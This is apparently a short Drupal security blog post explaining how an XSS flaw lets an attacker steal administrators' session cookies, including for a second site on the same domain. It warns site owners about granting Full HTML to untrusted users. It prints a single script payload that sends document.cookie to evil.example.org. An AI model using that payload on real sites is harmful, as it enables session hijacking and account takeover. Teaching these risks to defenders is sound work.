Using XSS to steal access
We've talked about Cross Site Scripting (XSS) before, and for good reason, it's a risk far too many sites are vulnerable to. XSS is scary because it runs in the context of the trusted relationship between your browser and a website; XSS can do everything you can do.
XSS cookie theft
Let's look at another example of an XSS exploit: stealing administrative access to a site.
- The administrator's browser will send the cookie to the attacker's website
- The attacker will use the stolen cookie to use the administrator's access on the site
Hijacking on a cookie is a big deal, but this demo will take it one step further. Because the administrator will also be logged in to another site on the same domain the attacker will receive that cookie as well. It's a two-for-one hack! Please watch this 5 minute video:
The exploit vector in the video is not standard. The community site was running Open Atrium which uses Markdown as the default Input Format and is not vulnerable to XSS. For demonstration purposes I granted Full HTML to authenticated users which is an insecure practice. Always be aware of what functionality you've granted to untrusted users.
<script> new Image().src = 'http://evil.example.org/steal.php?cookies=' + encodeURI(document.cookie); </script>
The unique thing about the demo is that because the administrator was logged into two sites on the same domain the attacker's XSS stole both cookies, allowing the attacker to gain access to a site they (potentially) could not otherwise hack.
The likelihood of an attack of this type being successful is questionable, but the risk should be considered. XSS vulnerabilities are extremely common in web applications, so you should audit your configuration and custom code for adherence to Drupal best practices.